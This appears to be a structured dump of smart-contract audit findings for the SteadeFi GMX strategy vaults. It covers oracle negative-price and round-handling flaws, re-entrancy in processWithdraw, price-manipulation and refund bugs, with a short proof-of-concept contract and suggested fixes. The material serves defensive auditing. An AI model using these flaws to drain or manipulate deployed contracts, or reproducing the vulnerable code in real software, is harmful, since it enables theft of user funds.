```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from "@openzeppelin/contracts/utils/math/SafeCast.sol";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n\\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal, uint256 _maxDeviation) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1\\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n }\\n\\n // Calling this returns currentResponse regardless of the maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) {\\n if (_badPriceDeviation(currentResponse, prevResponse)) revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Our scenario: the result is always zero when _prevResponse is negative\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n}\\n```\\n
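A minimal sketch of a hardened response check; the non-negative condition is the fix, while the other conditions shown are assumptions about what the original `_badChainlinkResponse` validates:\\n```\\nfunction _badChainlinkResponse(ChainlinkResponse memory response) internal view returns (bool) {\\n if (!response.success) return true; // call to the aggregator failed\\n if (response.roundId == 0) return true; // invalid round\\n if (response.timestamp == 0 || response.timestamp > block.timestamp) return true; // bad timestamp\\n if (response.answer <= 0) return true; // zero OR negative price is bad data\\n\\n return false;\\n}\\n```\\n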
Re-entrancy possible on processWithdraw since external call is made before burning user's shares in Vault
medium
Re-entrancy is possible on processWithdraw since the external call is made before burning the user's shares in the Vault:\\n```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\n // @audit external call: transfers ETH to the user via a low-level call\\n (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}("");\\n require(success, "Transfer failed.");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n // @audit the burn happens only after the external calls above\\n self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXWithdraw.sol#L182-L197\\nThe function is only accessible by the keeper (likely a router), which, as in the mockRouter example, would bundle the withdrawal and "afterWithdrawalExecution" together. However, since the router is out of scope and there is still a chance that a user can make use of the router to re-enter the function (there is no re-entrancy lock) and drain more funds than he actually deserves, this is submitted as a medium risk.
Burn the user's shares first, before executing the external call at the end.
Drain of user funds.
```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\n // @audit external call: transfers ETH to the user via a low-level call\\n (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}("");\\n require(success, "Transfer failed.");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n // @audit the burn happens only after the external calls above\\n self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n
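A minimal sketch of the checks-effects-interactions ordering, moving the burn ahead of every transfer (otherwise following the report's snippet):\\n```\\n // Burn user shares first (effects before interactions)\\n self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\n (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}("");\\n require(success, "Transfer failed.");\\n } else {\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n```\\n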
Min/max prices on getMarketTokenPrice are not utilized, so deposits and withdrawals use the same price, enabling cost-free manipulation
medium
Min/max prices on getMarketTokenPrice are not utilized, so deposits and withdrawals use the same price, enabling cost-free manipulation.\\nGMX provides getMarketTokenPrice on its syntheticReader, which leverages MarketUtils. It allows passing in index/long/short token prices with min/max values. The isDeposit flag is then used to determine whether the min or max price is used for calculating marketTokenPrice; this is important to always favor the protocol and prevent MEV.\\nHowever, in the getMarketTokenInfo implemented in GMXOracle, the same oracle price is passed as both the min and the max price for all of the long/short/lpToken inputs. This implies the same pricing is used for both deposits and withdrawals, enabling users to freely deposit/withdraw without cost or slippage. Malicious users can use this to trigger a rebalance and then deposit or withdraw directly on GMX in a way that benefits the attacker, with the use of bundled transactions.\\n```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n\\nhttps://github.com/gmx-io/gmx-synthetics/blob/613c72003eafe21f8f80ea951efd14e366fe3a31/contracts/reader/Reader.sol#L187-L206
Consider adding a small fee (5 bps) to buffer the price returned from `_getTokenPriceMinMaxFormatted` on both sides.
Free deposits and withdrawals, because the same token price is used for the min and max price, leading to the same marketTokenPrice calculation for deposits and withdrawals.
```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n
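A minimal sketch of the buffering idea (the library name, the single-price input shape, and the 5 bps constant are assumptions):\\n```\\nlibrary PriceBuffer {\\n uint256 internal constant BUFFER_BPS = 5; // 0.05%\\n uint256 internal constant BPS_DIVISOR = 10_000;\\n\\n // Derive distinct min/max prices from a single oracle price so that deposits\\n // and withdrawals are each priced against the side that favors the protocol\\n function bufferedMinMax(uint256 price) internal pure returns (uint256 minPrice, uint256 maxPrice) {\\n minPrice = price * (BPS_DIVISOR - BUFFER_BPS) / BPS_DIVISOR;\\n maxPrice = price * (BPS_DIVISOR + BUFFER_BPS) / BPS_DIVISOR;\\n }\\n}\\n```\\n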
Chainlinks oracle feeds are not immutable
medium
The fact that a Chainlink oracle works today does not mean it will be supported by Chainlink in the future and keep working, and it is also possible that the address of the price feed changes. Therefore, it does not make sense to prevent price feed addresses from being updated or removed, but the protocol prevents exactly that.\\nThere is only one function inside ChainlinkARBOracle to set the price feed addresses:\\n```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n\\nAs we can see, it will only allow a price feed to be set once and will revert when trying to update or remove it. Therefore, if Chainlink changes something, or the owner accidentally sets the wrong address, or the protocol no longer wants to support a price feed, it can not be removed or updated.
Chainlinks oracle feeds are not immutable\\nRemove this line:\\n```\\nif (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n```\\n
It is not possible to remove price feeds which are no longer supported by chainlink, or update the addresses of price feeds. This can lead to a complete DoS of the underlying token.\\nAs this feeds mapping is also the only check if it is a valid token when calling the oracle and the feed can not be removed, it will always pass this check even if the protocol no longer wishes to support this token:\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n // rest of code\\n}\\n```\\n
```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n
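A minimal sketch of feed management that allows updates and removal; `updateTokenPriceFeed` and `removeTokenPriceFeed` are hypothetical additions, reusing the report's error names:\\n```\\nfunction updateTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n\\n feeds[token] = feed; // hypothetical: allows overwriting an existing feed\\n}\\n\\nfunction removeTokenPriceFeed(address token) external onlyOwner {\\n if (feeds[token] == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n delete feeds[token]; // hypothetical: consult() will now reject this token\\n}\\n```\\n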
Unhandled DoS when access to Chainlink oracle is blocked
low
In certain exceptional scenarios, oracles may become temporarily unavailable. As a result, invoking the `latestRoundData` function could potentially revert without a proper error handling.\\nSteadefi documentation gives special focus on Chainlink price feed dependency, (https://github.com/Cyfrin/2023-10-SteadeFi/tree/main "Additional Context"). The concern stems from the potential for Chainlink multisignature entities to deliberately block the access to the price feed. In such a situation, using the `latestRoundData` function could lead to an unexpected revert.\\nIn certain extraordinary situations, Chainlink has already proactively suspended particular oracles. To illustrate, in the case of the UST collapse incident, Chainlink chose to temporarily halt the UST/ETH price oracle to prevent the propagation of incorrect data to various protocols.\\nAdditionally, this danger has been highlighted and very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our current scenario:\\n"While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly".\\nAs a result and taking into consideration the recommendation from OpenZepplin, it is essential to thoroughly tackle this matter within the codebase, as it directly relates to many functionalities of the system which are based on the oracle's output.\\nAnother example to check this vulnerability can be consulted in https://solodit.xyz/issues/m-18-protocols-usability-becomes-very-limited-when-access-to-chainlink-oracle-data-feed-is-blocked-code4rena-inverse-finance-inverse-finance-contest-git\\nAs previously discussed, to mitigate the potential risks related to a denial-of-service situation, it is recommended to implement a try-catch mechanism when querying Chainlink prices in the `_getChainlinkResponse` function within `ChainlinkARBOracle.sol` (link to code below). By adopting this approach, in case there's a failure in invoking the price feed, the caller contract retains control and can effectively handle any errors securely and explicitly.\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L188-L194\\n```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n
Unhandled DoS when access to Chainlink oracle is blocked\\nWrap the invocation of the `latestRoundData()` function within a `try-catch` structure rather than directly calling it. In situations where the function call triggers a revert, the catch block can be utilized to trigger an alternative oracle or handle the error in a manner that aligns with the system's requirements.
In the event of a malfunction or cessation of operation of a configured Oracle feed, attempting to check for the `latestRoundData` will result in a revert that must be managed manually by the system.
```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n
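A minimal sketch of the defensive pattern; the `ChainlinkResponse` struct fields follow the report's naming, and the fallback behavior is an assumption:\\n```\\nfunction _getChainlinkResponse(address _feed) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _response;\\n\\n try AggregatorV3Interface(_feed).latestRoundData() returns (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n uint256 /* _startedAt */,\\n uint256 _latestTimestamp,\\n uint80 /* _answeredInRound */\\n ) {\\n _response.roundId = _latestRoundId;\\n _response.answer = _latestAnswer;\\n _response.timestamp = _latestTimestamp;\\n _response.success = true;\\n } catch {\\n // success stays false: the caller can fall back to another oracle\\n // or revert with an explicit, handleable error\\n }\\n\\n return _response;\\n}\\n```\\n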
`Compound()` will not work if there is only TokenA/TokenB in the trove.
medium
The compound() function is designed to deposit Long tokens, Short tokens, or airdropped ARB tokens to the GMX for compounding. However, it will only work if there is ARB token in the trove. If there are only Long/Short tokens in the trove without any ARB, the function will not work.\\nThe `compound()` function is intended to be called by the keeper once a day to deposit all the Long/Short or ARB tokens to the GMX for further compounding. However, the logic for depositing to the GMX is restricted by the condition that the trove must always hold an airdropped ARB token.\\nHere is the relevant code snippet from the GitHub repository:\\n```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nThe code checks if there is a positive `_tokenInAmt` (representing ARB tokens) and proceeds with the depositing and compounding logic. However, if there is no ARB token but only tokenA and tokenB in the trove, the compounding will not occur and the tokens will remain in the compoundGMX contract indefinitely.\\nIt is important to note that the airdrop of ARB tokens is a rare event, making it less likely for this condition to be met. Therefore, if there are no ARB tokens but a significant amount of tokenA and tokenB in the trove, the compounding will not take place.
To mitigate this issue, always check whether tokenA/tokenB or ARB is present in the trove. If any of these is present, proceed with the compound action; otherwise, return. Note that the swap itself should still only run when there is an airdropped token to swap:\\n```\\nif (_tokenInAmt > 0 || self.tokenA.balanceOf(address(this)) > 0 || self.tokenB.balanceOf(address(this)) > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n // Only perform the swap when there is an airdropped token to swap\\n if (_tokenInAmt > 0) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n }\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n
If the compounding doesn't happen, this could lead to an indirect loss of funds for users and a loss of gas for the keeper, who would repeatedly call this function only to transfer tokens and check the ARB balance.
```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n
Positions may be liquidated due to incorrect implementation of Oracle logic
medium
Steadefi checks historical data to make sure that the last price update is within the maximum delay allowed and within the range of the maximum % deviation allowed.\\nBut the way the historical data is fetched is incorrect according to the Chainlink docs, which can break some important logic within the protocol.\\nThe vault calls ChainlinkARBOracle.consult(token) to get the fair price from the Chainlink oracle:\\n```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L62\\nwhich calls an internal function `_getPrevChainlinkResponse()` and tries to fetch the price and other details for the previous roundId:\\n```\\n function _getPrevChainlinkResponse(address _feed, uint80 _currentRoundId) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _prevChainlinkResponse;\\n\\n (\\n uint80 _roundId,\\n int256 _answer,\\n /* uint256 _startedAt */,\\n uint256 _timestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).getRoundData(_currentRoundId - 1);\\n\\n _prevChainlinkResponse.roundId = _roundId;\\n _prevChainlinkResponse.answer = _answer;\\n _prevChainlinkResponse.timestamp = _timestamp;\\n _prevChainlinkResponse.success = true;\\n\\n return _prevChainlinkResponse;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L210\\nBut this is an incorrect way of fetching historical data. The Chainlink docs say: `Oracles provide periodic data updates to the aggregators. Data feeds are updated in rounds. Rounds are identified by their roundId, which increases with each new round. This increase may not be monotonic. Knowing the roundId of a previous round allows contracts to consume historical data.\\nThe examples in this document name the aggregator roundId as aggregatorRoundId to differentiate it from the proxy roundId.` check here\\nSo it is not guaranteed that there will be valid data for currentRoundId - 1. If there is no data for currentRoundId - 1, then the `_badPriceDeviation(currChainlinkResponse, PrevResponse)` check here will return true. Hence the vault won't be able to get the price of the token at some specific times.
Positions may be liquidated due to incorrect implementation of Oracle logic\\nAs the Chainlink docs say, the increase in roundId may not be monotonic, so loop through the previous roundIds and fetch the first one that has data:\\npseudo code\\n```\\n iterate (from roundId-1 until we get the first previous data corresponding to a roundId){\\n if(data present for roundId){\\n fetch the data and return\\n }else{\\n again iterate to get the data\\n }\\n }\\n```\\n
In the worst case, the keeper won't be able to get the price of a token, so rebalancing and debt repayment won't be possible, leading to liquidation and breaking the most important guarantee of the protocol.\\nAlmost 70% of vault actions depend on the price of a token; not getting the price will make them inactive, affecting net APR.
```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n
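A minimal sketch of the recommendation as a replacement for `_getPrevChainlinkResponse` (the bounded lookback is an assumption to cap gas): walk backwards from the current round until a round with valid data is found, using try/catch since roundIds are not guaranteed to be contiguous.\\n```\\nfunction _getPrevChainlinkResponse(address _feed, uint80 _currentRoundId)\\n internal view returns (ChainlinkResponse memory)\\n{\\n ChainlinkResponse memory _prev;\\n uint80 _maxLookback = 10; // assumption: bounded search to cap gas\\n\\n for (uint80 i = 1; i <= _maxLookback && i <= _currentRoundId; i++) {\\n try AggregatorV3Interface(_feed).getRoundData(_currentRoundId - i) returns (\\n uint80 _roundId, int256 _answer, uint256, uint256 _timestamp, uint80\\n ) {\\n // Skip rounds with no valid data instead of blindly trusting roundId - 1\\n if (_answer != 0 && _timestamp != 0) {\\n _prev.roundId = _roundId;\\n _prev.answer = _answer;\\n _prev.timestamp = _timestamp;\\n _prev.success = true;\\n return _prev;\\n }\\n } catch {}\\n }\\n\\n return _prev; // success == false if no valid previous round was found\\n}\\n```\\n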
Incorrect Execution Fee Refund address on Failed Deposits or withdrawals in Strategy Vaults
high
The Strategy Vaults within the protocol use a two-step process for handling deposits/withdrawals via GMXv2. A `createDeposit()` transaction is followed by a callback function (afterDepositExecution() or afterDepositCancellation()) based on the transaction's success. In the event of a failed deposit due to vault health checks, the execution fee refund is mistakenly sent to the depositor instead of the keeper who triggers the deposit failure process.\\nThe protocol handles the `deposit` through the `deposit` function, which uses several parameters including an execution fee that refunds any excess fees.\\n```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n\\nThe refund is intended for the message sender (msg.sender), which in the initial deposit case, is the depositor. This is established in the `GMXDeposit.deposit` function, where `self.refundee` is assigned to `msg.sender`.\\n```\\nfunction deposit(GMXTypes.Store storage self, GMXTypes.DepositParams memory dp, bool isNative) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n\\n _dc.depositKey = GMXManager.addLiquidity(self, _alp);\\n\\n self.depositCache = _dc;\\n\\n emit DepositCreated(_dc.user, _dc.depositParams.token, _dc.depositParams.amt);\\n }\\n```\\n\\nIf the deposit passes the GMX checks, the `afterDepositExecution` callback is triggered, leading to `vault.processDeposit()` to check the vault's health. A failure here updates the status to `GMXTypes.Status.Deposit_Failed`. The reversal process is then handled by the `processDepositFailure` function, which can only be called by keepers. 
They pay for the transaction's gas costs, including the execution fee.\\n```\\nfunction processDepositFailure(uint256 slippage, uint256 executionFee) external payable onlyKeeper {\\n GMXDeposit.processDepositFailure(_store, slippage, executionFee);\\n }\\n```\\n\\nIn `GMXDeposit.processDepositFailure`, `self.refundee` is not updated, resulting in any excess execution fees being incorrectly sent to the initial depositor, although the keeper paid for it.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n } else {\\n // Remove only the newly added LP amount\\n _rlp.lpAmt = GMXReader.lpAmt(self) - self.depositCache.healthParams.lpAmtBefore;\\n\\n // If delta strategy is Long, remove all in tokenB to make it more\\n // efficent to repay tokenB debt as Long strategy only borrows tokenB\\n if (self.delta == GMXTypes.Delta.Long) {\\n address[] memory _tokenASwapPath = new address[](1);\\n _tokenASwapPath[0] = address(self.lpToken);\\n _rlp.tokenASwapPath = _tokenASwapPath;\\n\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenB), address(self.tokenB), slippage\\n );\\n } else {\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenA), address(self.tokenB), slippage\\n );\\n }\\n\\n _rlp.executionFee = executionFee;\\n\\n // Remove liqudity\\n self.depositCache.withdrawKey = GMXManager.removeLiquidity(self, _rlp);\\n }\\n```\\n\\nThe same issue occurs in the `processWithdrawFailure` function where the excess fees will be sent to the initial user who called withdraw instead of the keeper.
The `processDepositFailure` and `processWithdrawFailure` functions must be modified to update `self.refundee` to the current executor of the function, which, in the case of deposit or withdraw failure, is the keeper.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n\\n```\\nfunction processWithdrawFailure(\\n GMXTypes.Store storage self,\\n uint256 slippage,\\n uint256 executionFee\\n ) external {\\n GMXChecks.beforeProcessAfterWithdrawFailureChecks(self);\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n
This flaw causes a loss of funds for the keepers, negatively impacting the vaults. Users also inadvertently receive extra fees that are rightfully owed to the keepers
